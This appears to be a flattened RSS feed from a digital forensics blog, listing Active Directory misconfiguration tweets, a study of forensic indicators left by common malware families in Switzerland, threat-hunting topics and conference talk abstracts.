Tweet #3: Non-admin Users can add up to 10 Computer(s) to a Domain Original Tweet) #4: Dangerous Privileges Original Tweet #6: Log Interactively on to the Domain Controllers Original Tweet #7: “PASSWD_NOTREQD” Original Tweet #8: Interesting Attack Paths Original Tweet #8: Non-admin Users can add Computers to a Domain Original Tweet #9: Recycle Bin is not enabled Original Tweet https://dfir.ch/posts/n-iocs/ Sun, 31 Dec 2023 19:13:36 +0200 https://dfir.ch/posts/n-iocs/ Introduction We analyzed the top ten malware families in Switzerland (according to govcert.ch) during the period April - December 2022 to find patterns and overlaps in the forensic artifacts that a successful infection leaves on an endpoint. We explicitly did not analyze the infection chain (how the infection happens – macros, wscript, hta, etc.), but rather the traces left by the second stage, i.e., the final malware executed on the endpoint. https://dfir.ch/tweets/threathunting/ Fri, 11 Aug 2023 16:27:19 +0200 https://dfir.ch/tweets/threathunting/ Remote Access Trojans (RATs) AsyncRAT AsyncRAT, Part 2 Quasar Rat Remote Monitoring and Management (RMM) action1 DWservice Remote Monitoring & Management (RMM) Splashtop User Agents User-Agent analysis User-Agents, Part 2 User-Agents, Part 3 SystemBC PowerShell version of SystemBC Misc NamedPipes DHCP Logs Hunting for hostname outliers Hidden User Account Non-Sucking Service Manager Renamed Binares NSudo https://dfir.ch/talks/firstcon_2023/ Fri, 05 May 2023 16:04:20 +0200 https://dfir.ch/talks/firstcon_2023/ Abstract The Swiss GovCERT published monthly statistics on the most common malware families in Switzerland. Much of the published analysis on these malware families focused on the malware’s reverse engineering rather than the forensic artifacts that a successful infection leaves on a host.In our research, we examined the top malware families from a forensic perspective to find commonalities in infection, data collection, and network transmission. Through the data obtained through our research, we were able to identify targeted IOC (Indicators of Compromise) that can be used for all malware families (for example, run keys, executables in the AppData folder, specific event logs). https://dfir.ch/talks/swisscyberstorm_2022/ Tue, 25 Oct 2022 16:04:20 +0200 https://dfir.ch/talks/swisscyberstorm_2022/ Abstract Stephan Berger, Head of Investigations at InfoGuard, will share insights from recent InfoGuard CSIRT security incidents and present the seven biggest security failures of companies that still open the door to attackers far too often. Figure 1: The Seven Deadly Sins Youtube Video https://dfir.ch/talks/swisscyberstorm_2021/ Tue, 12 Oct 2021 16:04:20 +0200 https://dfir.ch/talks/swisscyberstorm_2021/ Abstract Figure 1: Ransomware in Switzerland and around the World Youtube Video